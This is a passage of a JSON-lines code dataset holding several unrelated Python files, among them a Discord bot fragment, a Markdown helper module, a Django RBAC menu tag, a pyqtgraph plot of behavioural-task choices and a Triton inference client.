MEMBERS SCANNED, NO GORDO ALTS FOUND\")\n elif defaultmembers == 1:\n complete.append(f\"{len(ctx.guild.members)} MEMBERS SCANNED, {defaultmembers} GORDO ALT FOUND\")\n else:\n complete.append(f\"{len(ctx.guild.members)} MEMBERS SCANNED, {defaultmembers} GORDO ALTS FOUND\")\n await message.edit(content=random.choice(complete))\n\nimport config\nbot.run(config.token, 
bot=True)\n","sub_path":"keto.py","file_name":"keto.py","file_ext":"py","file_size_in_byte":7471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80774474","text":"\"\"\"\n east.helpers\n ============\n Various helper functions and data structures\n\n :copyright: (c) 2016 by Zvonimir Jurelinac\n :license: MIT\n\"\"\"\n\nimport mistune\n\nfrom collections import OrderedDict\nfrom datetime import date, datetime\n\nfrom pygments import highlight\nfrom pygments.lexers import get_lexer_by_name\nfrom pygments.formatters import html\n\n\n# Data serialization functions\n\ndef serialize(obj, *args):\n \"\"\"Serialize an object for future JSON encoding\"\"\"\n value = obj(*args) if callable(obj) else obj\n return value.isoformat() if isinstance(value, (date, datetime)) else value\n\n\ndef to_jsondict(obj, view=''):\n \"\"\"Convert Python object to JSON-encodable dictionary\"\"\"\n return obj.to_jsondict(view) if hasattr(obj, 'to_jsondict') else obj\n\n\ndef to_jsontype(type):\n \"\"\"Convert Python type names to Javascript/JSON equivalents\"\"\"\n typename = type.__name__ if type else None\n renames = {'str': 'string', 'int': 'integer', 'bool': 'bool'}\n if typename in renames:\n typename = renames[typename]\n return typename\n\n\n# Meta functions\n\ndef clear_json_quotes(json_data):\n \"\"\"Remove quotes surrounding types from JSON response documentation\"\"\"\n lines = []\n for line in json_data.splitlines():\n if ':' in line:\n key, value = line.split(':', maxsplit=1)\n value = value.strip()\n lines.append(key + ': ' + value.strip('\",') + (',' if value.endswith(',') else ''))\n else:\n lines.append(' ' * (len(line) - len(line.lstrip(' '))) + line.strip('\" '))\n return '\\n'.join(lines)\n\n\ndef get_class_plural_name(cls):\n \"\"\"Convert class name to it's plural form\"\"\"\n base = cls.__name__.lower()\n for ending in ('s', 'z', 'x', 'ch', 'sh'):\n if base.endswith(ending):\n return base + 'es'\n if base.endswith('y'):\n return base[:-1] + 'ies'\n else:\n return base + 's'\n\n\ndef parse_argdict(extras):\n \"\"\"Parse arguments dict - replace all functions by their return values\"\"\"\n return [(key, value() if callable(value) else value) for key, value in extras.items()]\n\n\n# Datastructures\n\n# class OrderedDefaultDict(OrderedDict, defaultdict):\n# def __init__(self, default_factory=None, *args, **kwargs):\n# super().__init__(*args, **kwargs)\n# self.default_factory = default_factory\n\n\nclass OrderedDefaultDict(OrderedDict):\n # Source: http://stackoverflow.com/a/6190500/562769\n def __init__(self, default_factory=None, *a, **kw):\n if (default_factory is not None and not callable(default_factory)):\n raise TypeError('first argument must be callable')\n super().__init__(*a, **kw)\n self.default_factory = default_factory\n\n def __getitem__(self, key):\n try:\n return super().__getitem__(key)\n except KeyError:\n return self.__missing__(key)\n\n def __missing__(self, key):\n if self.default_factory is None:\n raise KeyError(key)\n self[key] = value = self.default_factory()\n return value\n\n def __reduce__(self):\n if self.default_factory is None:\n args = tuple()\n else:\n args = self.default_factory,\n return type(self), args, None, None, self.items()\n\n def copy(self):\n return self.__copy__()\n\n def __copy__(self):\n return type(self)(self.default_factory, self)\n\n def __deepcopy__(self, memo):\n import copy\n return type(self)(self.default_factory,\n copy.deepcopy(self.items()))\n\n def __repr__(self):\n return 
'OrderedDefaultDict(%s, %s)' % (self.default_factory,\n                                               super().__repr__())\n\n\nclass EastMarkdownParser:\n    \"\"\"\n    Custom markdown parser\n\n    Supports code highlighting via Pygments and Table of Contents generation\n    \"\"\"\n\n    def __init__(self):\n\n        class EastRenderer(mistune.Renderer):\n\n            def __init__(self, create_toc=False):\n                self.create_toc = create_toc\n                self.toc_list = []\n                self.toc_count = -1\n                super().__init__()\n\n            def block_code(self, code, lang):\n                if not lang:\n                    return '\n<pre><code>%s</code></pre>\n' % \\n                        mistune.escape(code)\n                lexer = get_lexer_by_name(lang, stripall=True)\n                formatter = html.HtmlFormatter()\n                return highlight(code, lexer, formatter)\n\n            def header(self, text, level, raw=None):\n                if self.create_toc and level == 2:\n                    self.toc_list.append(text)\n                    self.toc_count += 1\n                    return '<h%d id=\"toc-%d\">%s</h%d>\n' % (level, self.toc_count, text, level)\n                else:\n                    return '<h%d>%s</h%d>\n' % (level, text, level)\n\n            def reset_toc(self):\n                self.toc_list = []\n                self.toc_count = -1\n\n            def toc(self):\n                return '\n'.join(['<li><a href=\"#toc-%d\">%s</a></li>'\n                                 % (i, h) for i, h in enumerate(self.toc_list)])\n\n        self.renderer = EastRenderer()\n        self.parser = mistune.Markdown(renderer=self.renderer)\n\n    def render(self, raw, create_toc=False):\n        self.renderer.create_toc = create_toc\n        if create_toc:\n            self.renderer.reset_toc()\n        return self.parser(raw)\n
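\n# Usage sketch (hypothetical, not part of the original module):\n#   parser = EastMarkdownParser()\n#   body_html = parser.render('## Section one', create_toc=True)\n#   toc_html = parser.renderer.toc()\n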
","sub_path":"east/east/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647772475","text":"# Author: Thomas Vu\r\n# Email: thomas.vu@ucalgary.ca\r\n# Feel free to send any questions about this problem to the email above\r\n# or ask in the CPC discord. (discord.gg/MEXwfze)\r\n\r\nn = int(input())\r\ntemperatures = [int(i) for i in input().split()]\r\ntempsBelowZero = 0\r\nfor temp in temperatures:\r\n    if temp < 0:\r\n        tempsBelowZero += 1\r\nprint(tempsBelowZero)\r\n\r\n\r\n# Short version:\r\n\r\n# input()\r\n# print(input().count(\"-\"))\r\n","sub_path":"solutions/cold.py","file_name":"cold.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598586756","text":"from __future__ import print_function, unicode_literals\nimport os\nimport string\nimport markdown\nimport codecs\nfrom glob import glob\nfrom shutil import copyfile\nfrom general_tools.file_utils import write_file\nfrom converter import Converter\nfrom door43_tools.obs_handler import OBSInspection\nfrom door43_tools.obs_data import obs_data\n\n\nclass Md2HtmlConverter(Converter):\n\n    def convert_obs(self):\n        self.logger.info('Processing the OBS markdown files')\n\n        # find the first directory that has md files.\n        files = self.get_files()\n\n        current_dir = os.path.dirname(os.path.realpath(__file__))\n        with open(os.path.join(current_dir, 'templates', 'obs-template.html')) as template_file:\n            html_template = string.Template(template_file.read())\n\n        found_chapters = {}\n\n        for filename in files:\n            if filename.endswith('.md'):\n                # Convert files that are markdown files\n                with codecs.open(filename, 'r', 'utf-8-sig') as md_file:\n                    md = md_file.read()\n                html = markdown.markdown(md)\n
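                # safe_substitute() fills $content in the page template and, unlike\n                # substitute(), leaves any unmatched $placeholders intact instead of\n                # raising KeyError.\n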
                html = html_template.safe_substitute(content=html)\n                base_name = os.path.splitext(os.path.basename(filename))[0]\n                found_chapters[base_name] = True\n                html_filename = base_name + \".html\"\n                output_file = os.path.join(self.output_dir, html_filename)\n                write_file(output_file, html)\n                self.logger.info('Converted {0} to {1}.'.format(os.path.basename(filename), os.path.basename(html_filename)))\n\n                # Do the OBS inspection (this now operates on a single file instead of a folder)\n                # QUESTION: Should this be done separately after conversion????\n                inspector = OBSInspection(output_file, self.logger)\n                try:\n                    inspector.run()\n                except Exception as e:\n                    self.logger.warning('Chapter {0}: failed to run OBS inspector: {1}'.format(base_name, e.message))\n            else:\n                # Directly copy over files that are not markdown files\n                try:\n                    output_file = os.path.join(self.output_dir, os.path.basename(filename))\n                    if not os.path.exists(output_file):\n                        copyfile(filename, output_file)\n                except:\n                    pass\n\n        for chapter in sorted(obs_data['chapters']): # verify all expected chapters are present\n            found_chapter = found_chapters.get(chapter)\n            if not found_chapter:\n                self.logger.warning('Chapter {0} is missing!'.format(chapter))\n\n        self.logger.info('Finished processing Markdown files.')\n","sub_path":"converters/md2html_converter.py","file_name":"md2html_converter.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"179896314","text":"import database\r\n\r\n# # add a record to the database\r\n# database.add_one(\"Pako\", \"Iliev\" , \"pako@pako.es\")\r\n\r\n\r\n\r\n# # delete a record (row id passed as a string)\r\n# database.delete_one('5')\r\n\r\n\r\n# add many records\r\nstuff = [\r\n    ('Ceko', 'Sofinq', 'ceko@sifonq.bg'),\r\n    ('Tigar', 'Pobesnel', 'tigar@besen.bg')\r\n    ]\r\n    \r\ndatabase.add_many(stuff)\r\n\r\n\r\n# show all the records\r\ndatabase.show_all()","sub_path":"our_app.py","file_name":"our_app.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45379346","text":"import os\r\nimport re\r\n\r\nfrom django import template\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import mark_safe\r\n\r\nregister = template.Library()\r\n\r\n\r\ndef get_structure_data(request):\r\n    \"\"\"Build the menu structure from the session data\"\"\"\r\n    menu = request.session[settings.SESSION_MENU_KEY]\r\n    all_menu = menu[settings.ALL_MENU_KEY]\r\n    permission_url = menu[settings.PERMISSION_MENU_KEY]\r\n\r\n    # all_menu = [\r\n    #     {'id': 1, 'title': '订单管理', 'parent_id': None},\r\n    #     {'id': 2, 'title': '库存管理', 'parent_id': None},\r\n    #     {'id': 3, 'title': '生产管理', 'parent_id': None},\r\n    #     {'id': 4, 'title': '生产调查', 'parent_id': None}\r\n    # ]\r\n\r\n    # reshape into a dict keyed by menu id\r\n    all_menu_dict = {}\r\n    for item in all_menu:\r\n        item['status'] = False\r\n        item['open'] = False\r\n        item['children'] = []\r\n        all_menu_dict[item['id']] = item\r\n\r\n    # all_menu_dict = {\r\n    #     1: {'id': 1, 'title': '订单管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n    #     2: {'id': 2, 'title': '库存管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n    #     3: {'id': 3, 'title': '生产管理', 'parent_id': None, 'status': False, 'open': False, 'children': []},\r\n    #     4: {'id': 4, 'title': '生产调查', 'parent_id': None, 'status': False, 'open': False, 'children': []}\r\n    # }\r\n\r\n    # permission_url = [\r\n    #     {'title': '查看订单', 'url': '/order', 'menu_id': 1},\r\n    #     {'title': '查看库存清单', 'url': '/stock/detail', 'menu_id': 2},\r\n    #     {'title': '查看生产订单', 'url': '/produce/detail', 'menu_id': 3},\r\n    #     {'title': '产出管理', 'url': '/survey/produce', 'menu_id': 4},\r\n    #     {'title': '工时管理', 'url': '/survey/labor', 'menu_id': 4},\r\n    #     {'title': '入库', 'url': '/stock/in', 'menu_id': 2},\r\n    #     {'title': '排单', 'url': '/produce/new', 'menu_id': 3}\r\n    # ]\r\n\r\n    request_url = request.path_info\r\n\r\n    for url in permission_url:\r\n        # add two state flags: visible ('status') and expanded ('open')\r\n        url['status'] = True\r\n        pattern = url['url']\r\n\r\n        if re.match(pattern, request_url):\r\n            url['open'] = True\r\n        else:\r\n            url['open'] = False\r\n\r\n        # attach the url to its menu's children\r\n        all_menu_dict[url['menu_id']][\"children\"].append(url)\r\n\r\n        # show the url's menu and all of its ancestors: status = True\r\n        pid = url['menu_id']\r\n        while pid:\r\n            all_menu_dict[pid]['status'] = True\r\n            pid = all_menu_dict[pid]['parent_id']\r\n\r\n        # expand the active url's ancestors: if url['open'] is True, its menu and every parent menu get open = True\r\n        if url['open']:\r\n            ppid = url['menu_id']\r\n            while ppid:\r\n                all_menu_dict[ppid]['open'] = True\r\n                ppid = all_menu_dict[ppid]['parent_id']\r\n\r\n    # assemble the hierarchy: items without a parent_id are root menus; the rest are appended to their parent's children\r\n    menu_data = []\r\n    for i in all_menu_dict:\r\n        if all_menu_dict[i]['parent_id']:\r\n            pid = all_menu_dict[i]['parent_id']\r\n            parent_menu = all_menu_dict[pid]\r\n            parent_menu['children'].append(all_menu_dict[i])\r\n        else:\r\n            menu_data.append(all_menu_dict[i])\r\n\r\n    return menu_data\r\n\r\n\r\n
def get_menu_html(menu_data):\r\n    \"\"\"Render: menu + [submenus] + permissions (urls)\"\"\"\r\n\r\n    list_title_blank = ['库存导入'] # titles that must open in a new window\r\n\r\n
    option_str = \"\"\"\r\n    <li>\r\n        <a href=\"#\">\r\n            {menu_title}\r\n        </a>\r\n        <ul>\r\n            {sub_menu}\r\n        </ul>\r\n    </li>\r\n    \"\"\"\r\n\r\n    url_str = \"\"\"\r\n    <li>\r\n        <a href=\"{permission_url}\">\r\n            {permission_title}\r\n        </a>\r\n    </li>\r\n    \"\"\"\r\n\r\n    url_str_blank = \"\"\"\r\n    <li>\r\n        <a href=\"{permission_url}\" target=\"_blank\">\r\n            {permission_title}\r\n        </a>\r\n    </li>\r\n    \"\"\"\r\n\r\n    menu_html = ''\r\n    for item in menu_data:\r\n        if not item['status']: # skip menus the user has no permission under (status=False)\r\n            continue\r\n        else:\r\n            if item.get('url'): # an innermost url entry has been reached\r\n                if item['title'] in list_title_blank:\r\n                    menu_html += url_str_blank.format(permission_url=item['url'],\r\n                                                      permission_title=item['title'])\r\n                else:\r\n                    menu_html += url_str.format(permission_url=item['url'],\r\n                                                permission_title=item['title'])\r\n            else:\r\n                menu_html += option_str.format(menu_title=item['title'],\r\n                                               sub_menu=get_menu_html(item['children']))\r\n\r\n    return menu_html\r\n\r\n\r\n@register.simple_tag\r\ndef rbac_menu(request):\r\n    \"\"\"\r\n    Render the multi-level menu:\r\n    a request comes in -- fetch the menu and permission data from the session -- process the data -- render it.\r\n    The data processing is factored into its own function, and so is the rendering.\r\n    \"\"\"\r\n    menu_data = get_structure_data(request)\r\n    menu_html = get_menu_html(menu_data)\r\n\r\n    # template tags cannot use the |safe filter, so mark_safe() is used here instead\r\n    # print(menu_html)\r\n    return mark_safe(menu_html)\r\n","sub_path":"rbac/templatetags/custom_tag.py","file_name":"custom_tag.py","file_ext":"py","file_size_in_byte":6321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"401609860","text":"# Choice Plot --------------------------------------------------------\nimport pyqtgraph as pg\nimport numpy as np\nfrom config.gui_settings import choice_history_len,choice_plot_window,choice_plot_look_ahead\nfrom PyQt5.QtCore import Qt\n\nclass Sequence_Plot():\n    def __init__(self, parent_plot, data_len=100):\n        self.plot_widget = parent_plot\n        correct_color = pg.mkColor(0,255,0) # green\n        correct_no_liquid_color = pg.mkColor(0,255,0,80) # faded green\n        incorrect_color = pg.mkColor(0,0,0) # black\n        background_color = pg.mkColor(255,255,0) # yellow\n        background_no_liquid_color = pg.mkColor(255,255,0,128) # faded yellow\n        faulty_color = pg.mkColor(255,0,0) # red\n        self.my_colors = (correct_color, incorrect_color,background_color,faulty_color,correct_no_liquid_color,background_no_liquid_color)\n        self.my_symbols = ('o','+','s','t') # circle, plus, square, triangle\n        self.is_active = False\n        self.do_update = True\n        self.data_len = choice_history_len\n        self.new_bout_line = pg.InfiniteLine(angle=90,pen='#FF1FE6')\n        self.bout_text = pg.TextItem(\"testing\", anchor=(0, .5))\n        self.faulty_line = None\n        self.faulty_drawn_in_center = False\n        self.bout_info_ylocation = 4\n\n    def set_state_machine(self,sm_info):\n        if not self.is_active: return\n        self.setup_plot_widget()\n        \n    def setup_plot_widget(self):\n        self.last_choice = ''\n        self.reward_seq = ''\n        self.label_new_bout = False\n        self.next_seq = ''\n        self.bout_start_trial = 0\n        self.next_block_start = 0\n\n        self.rewarded_trials = 0\n        \n        self.plot_widget.hideAxis('right')\n        self.plot_widget.showAxis('left')\n        self.plot_widget.setRange(xRange=[-1,choice_plot_window+choice_plot_look_ahead], padding=0)\n        self.plot_widget.setMouseEnabled(x=True,y=False)\n        self.plot_widget.showGrid(x=True,alpha=0.75)\n        self.plot_widget.setLimits(xMin=-1)\n\n        self.plot_widget.clear()\n        self.plot_widget.getAxis('bottom').setLabel('Rat Perceived Trial')\n        self.plot_widget.getAxis('right').setWidth(75)\n        self.plot_widget.getAxis('left').setWidth(50)\n\n        self.plot_widget.setYRange(4,9, padding=0.1)\n        self.plot = self.plot_widget.plot(pen=None, symbol='o', symbolSize=6, symbolPen=None)\n\n        self.plot_widget.setTitle('Choices and Outcomes')\n        self.plot_widget.getAxis('left').setTicks([[(7,'Left'),(6,'Right')]])\n\n    def run_start(self):\n        if not self.is_active: return\n        self.plot.clear()\n        self.trial_num = 
0\n self.data = np.zeros([self.data_len,6])\n self.plot_widget.addItem(self.bout_text)\n self.plot_widget.addItem(self.new_bout_line)\n\n def process_data(self, new_data):\n if not self.is_active: return\n '''Store new data from board.'''\n faulty_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='faulty'] \n outcome_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='rslt'] \n new_block_msgs = [nd for nd in new_data if nd[0] == 'P' and nd[2].split(',')[0]=='NB']\n newBlock_var_update_msgs = [nd for nd in new_data if nd[0] == 'V' and nd[2].split(' ')[0].find('trials_until_change')>-1] \n if outcome_msgs:\n n_new = len(outcome_msgs)\n self.data = np.roll(self.data, -n_new, axis=0)\n for i, ne in enumerate(outcome_msgs):\n trial_num_string,self.reward_seq,choice,outcome,reward_vol,center_hold,side_delay,faulty_chance,faulty_maxcount,faulty_time_limit = ne[-1].split(',')[1:]\n self.trial_num = int(trial_num_string)\n if choice == 'L':\n if self.last_choice == 'L':\n self.consecutive_adjustment += .2\n else:\n self.consecutive_adjustment = 0\n side = 7 + self.consecutive_adjustment\n elif choice == 'R':\n if self.last_choice == 'R':\n self.consecutive_adjustment += .2\n else:\n self.consecutive_adjustment = 0\n side = 6 - self.consecutive_adjustment\n else:\n side = 0\n self.last_choice = choice\n self.last_side = side\n\n if outcome == 'C': # was rewarded\n self.rewarded_trials += 1\n color = 0\n symbol = 2 #square\n elif outcome == 'W': # correct sequence, but rewared was withheld\n color = 4\n symbol = 2 #square\n elif outcome == 'N' or outcome == 'P': # was not rewarded\n color = 1\n symbol = 2 #square\n elif outcome == 'B': # background reward\n color = 2\n symbol = 2 #square\n elif outcome == 'A': # abandoned trial\n color = 1\n symbol = 3 #triangle\n elif outcome == 'F': # this \"rat percieved trial\" occured after a faulty nosepoke\n color = 3\n symbol = 0\n self.next_block_start +=1\n self.new_bout_line.setValue(self.next_block_start)\n self.bout_text.setPos(self.next_block_start, self.bout_info_ylocation)\n self.bout_text.setText(str(self.next_block_start - self.trial_num))\n \n self.data[-n_new+i,0] = self.trial_num\n self.data[-n_new+i,1] = side\n self.data[-n_new+i,2] = color\n self.data[-n_new+i,3] = symbol\n \n self.plot.setData(self.data[:,0],self.data[:,1],\n symbol=[self.my_symbols[int(ID)] for ID in self.data[:,3]],\n symbolSize=10,\n symbolPen=pg.mkPen(color=(150,150,150),width=1),\n symbolBrush=[self.my_colors[int(ID)] for ID in self.data[:,2]]\n )\n \n if self.faulty_drawn_in_center:\n self.faulty_drawn_in_center = False\n self.plot_widget.removeItem(self.faulty_line)\n self.faulty_line = pg.ErrorBarItem(x=np.array([self.trial_num - .5]),y=np.array([self.last_side]),height=.5,pen = pg.mkPen(color='#FF1F1F',width=3))\n self.plot_widget.addItem(self.faulty_line)\n\n\n self.update_title()\n if self.do_update:\n self.plot_widget.setRange(xRange=[self.trial_num-choice_plot_window,self.trial_num+choice_plot_look_ahead], padding=0)\n if faulty_msgs and not self.faulty_drawn_in_center:\n self.faulty_line = pg.ErrorBarItem(x=np.array([self.trial_num + .5]),y=np.array([6.5]),height=.5,pen = pg.mkPen(color='#FF1F1F',width=3))\n self.plot_widget.addItem(self.faulty_line)\n self.faulty_drawn_in_center = True\n if new_block_msgs:\n for nb_msg in new_block_msgs:\n # label old bout change\n transition_line = pg.InfiniteLine(angle=90,pen=pg.mkPen(color='#FF1FE6',style=Qt.DashLine))\n transition_line.setValue(self.next_block_start + .5)\n 
self.plot_widget.addItem(transition_line)\n self.label_new_bout = True\n\n\n content = nb_msg[2].split(',')\n # add new bout change\n self.next_block_start = int(content[2]) + self.trial_num\n self.next_seq = content[3]\n self.new_bout_line.setValue(self.next_block_start + .5)\n self.bout_text.setPos(self.next_block_start + .5, self.bout_info_ylocation)\n\n # update title\n self.reward_seq = content[1]\n self.update_title()\n \n if newBlock_var_update_msgs:\n for block_start_update in newBlock_var_update_msgs:\n content = block_start_update[2].split(' ')\n self.next_block_start = int(content[1]) + self.trial_num\n self.new_bout_line.setValue(self.next_block_start)\n self.bout_text.setPos(self.next_block_start, self.bout_info_ylocation)\n self.bout_text.setText(str(self.next_block_start - self.trial_num))\n if newBlock_var_update_msgs:\n self.update_title()\n\n def toggle_update(self):\n self.do_update = not self.do_update\n if self.do_update:\n self.plot_widget.setRange(xRange=[self.trial_num-choice_plot_window,self.trial_num+choice_plot_look_ahead], padding=0)\n\n def update_title(self):\n if self.trial_num:\n reward_percentage = round(self.rewarded_trials/self.trial_num*100,2)\n else:\n reward_percentage = 0\n self.plot_widget.setTitle('{} Rat Perceived Choices made --- {:.1f}% Perceived Trials Rewarded --- Current Reward Sequence:{}'.format(\n self.trial_num,reward_percentage,self.create_color_string(self.reward_seq)))\n self.bout_text.setHtml('{} in {} real trials'.format(self.create_color_string(self.next_seq),str(self.next_block_start - self.trial_num)))\n if self.label_new_bout:\n self.label_new_bout = False\n current_seq_text = pg.TextItem(html = self.create_color_string(self.reward_seq), anchor=(0, .5))\n current_seq_text.setPos(self.trial_num +.5, self.bout_info_ylocation)\n self.plot_widget.addItem(current_seq_text)\n\n if self.trial_num != 0: #don't do this for start of session\n previous_bout_length_text = pg.TextItem(str(self.trial_num - self.bout_start_trial), anchor=(1, .5))\n previous_bout_length_text.setPos(self.trial_num +.5, self.bout_info_ylocation)\n self.plot_widget.addItem(previous_bout_length_text)\n self.bout_start_trial = self.trial_num\n\n def update_block_marker(self,xpos):\n pass\n\n def create_color_string(self,sequence_string):\n blue,orange = '#00DEFF','#FF9A00'\n output_string = ''\n for letter in sequence_string:\n if letter == 'L':\n color = orange\n else:\n color = blue\n output_string += '{}'.format(color,letter)\n return output_string\n","sub_path":"gui/sequence_gui/choice_plot.py","file_name":"choice_plot.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"464358846","text":"import taco_vis as tv\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\n\n########################\n# Create example dataset:\ndef flow_func(radius, theta, time):\n u = np.sin(2 * np.pi * radius) * np.sin(theta) * np.sin(2 * np.pi * time)\n return u\n\n\ntime = np.linspace(0, 1, 50)\nradius = np.linspace(0, 1, 10)\ntheta = np.linspace(0, 2 * np.pi, 50)\n\nTH, R, T = np.meshgrid(theta, radius, time)\ndata = flow_func(R, TH, T)\n\n# Read data into flow class\nf = tv.FLOW(data)\n\nassert np.min(f.data) < 0, 'Data has no negative values'\nassert np.max(f.data) > 0, 'Data has no positive values'\n\n\n# Test animate contour plot_contours\nf.colorbar_title = \"Non-dimensional\\nvelocity\"\nf.movie_filename = \"test_contour.mp4\"\nf.plot_contours(animate=True, save=True)\n# 
If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f.movie_filename), 'File {} does not exist after saving'.format(f.movie_filename)\n\n\n# Test contour plot_contours\nf.colorbar_title = \"Non-dimensional\\nvelocity\"\nf.image_filename = \"test_contour.png\"\nf.plot_contours(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f.image_filename), 'File {} does not exist after saving'.format(f.movie_filename)\n\n\n#Create axisymmetric data\ndata_axisym = flow_func(R, np.pi/2, T)\n\nf_axisym = tv.FLOW(data_axisym)\n\nf_axisym.image_filename = \"test_cylinders.png\"\nf_axisym.colorbar_title = \"Non-dimensional\\nvelocity\"\nf_axisym.plot_cylinders(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f_axisym.image_filename), 'File {} does not exist after saving'.format(f_axisym.movie_filename)\n\n\nf_axisym.image_filename = \"test_cylinders_3D.png\"\nf_axisym.plot_cylinders_3D(save=True, time_idx=14)\n# If plotting another image, close this animation figure first.\nplt.close(\"all\")\nassert os.path.isfile(f_axisym.image_filename), 'File {} does not exist after saving'.format(f_axisym.movie_filename)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530846742","text":"def jump(A):\n if len(A) <= 1:\n return 0\n jumps = [-1]*(len(A)-1)\n jumps.append(0)\n lastPosition = len(A)-1\n for i in range(len(A)-2, -1, -1):\n if A[i] + i >= lastPosition:\n jumps[i] = min([1+jumps[j] for j in range(i+1, A[i]+i+1) if jumps[j] >= 0])\n lastPosition = i\n return jumps[0]\n\nprint(jump([1,2]))\n","sub_path":"week18/Jing/test_jump_2.py","file_name":"test_jump_2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479879602","text":"#!/usr/bin/env python\n# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of NVIDIA CORPORATION nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS ``AS IS'' AND ANY\n# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR\n# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY\n# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport argparse\nimport numpy as np\nimport sys\nimport random\n\nimport tritongrpcclient\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v',\n '--verbose',\n action=\"store_true\",\n required=False,\n default=False,\n help='Enable verbose output')\n parser.add_argument('-m',\n '--model_name',\n type=str,\n required=True,\n help='Model name')\n parser.add_argument('-u',\n '--url',\n type=str,\n required=False,\n default='localhost:8001',\n help='Inference server URL. Default is localhost:8001.')\n\n FLAGS = parser.parse_args()\n try:\n triton_client = tritongrpcclient.InferenceServerClient(url=FLAGS.url,\n verbose=FLAGS.verbose)\n except Exception as e:\n print(\"channel creation failed: \" + str(e))\n sys.exit()\n\n model_name = FLAGS.model_name \n\n mconf = triton_client.get_model_config(model_name, as_json=True)\n print('config:\\n', mconf)\n \n for i in range(50):\n # Infer\n inputs = []\n outputs = []\n \n nnodes = random.randint(100, 4000)\n nedges = random.randint(8000, 15000)\n\n inputs.append(tritongrpcclient.InferInput('x__0', [nnodes, 1433], 'FP32'))\n inputs.append(tritongrpcclient.InferInput('edgeindex__1', [2, nedges], \"INT64\"))\n\n x = np.random.normal(-10, 4, (nnodes, 1433)).astype(np.float32)\n x[x < 0] = 0.\n x[x > 1] = 1.\n edge_index = np.random.randint(0, nnodes, (2, nedges), dtype=np.int64)\n \n print(x.shape)\n print(edge_index.shape)\n\n # prepare inputs\n inputs[0].set_data_from_numpy(x)\n inputs[1].set_data_from_numpy(edge_index)\n\n # prepare outputs\n outputs.append(tritongrpcclient.InferRequestedOutput('logits__0'))\n\n # get the output\n results = triton_client.infer(model_name=model_name,\n inputs=inputs,\n outputs=outputs)\n output0_data = results.as_numpy('logits__0')\n print(output0_data)\n\n statistics = triton_client.get_inference_statistics(model_name=model_name)\n print(statistics)\n if len(statistics.model_stats) != 1:\n print(\"FAILED: Inference Statistics\")\n sys.exit(1)\n\n print('PASS: infer')\n","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116246617","text":"import os\nimport sys\nimport random\n\nfrom not_directed_graph import NotDirectedGraph\nfrom graph_builder import buildGraphFromFile\nfrom breath_first_search import breadthFirstSearch\nfrom eulerian_cycle import getEulerianTour\nfrom dijkstra import dijkstra\nfrom floyd_warshall import floydWarshall\nfrom topological_sorting import topologialSort\nfrom minimum_spanning_tree import minimumSpanningTree\n\n# on the first call to this function you must be SURE that \"path\" exists in the actual os.listdir()\nfrom strongly_connected_components import stronglyConnectedComponentes\n\n\ndef buildEachInstance(path: str) -> 'dict of Graphs':\n\tgraphs = dict()\n\n\t# go into folder\n\tos.chdir(path)\n\n\tfor item in os.listdir():\n\t\tif 
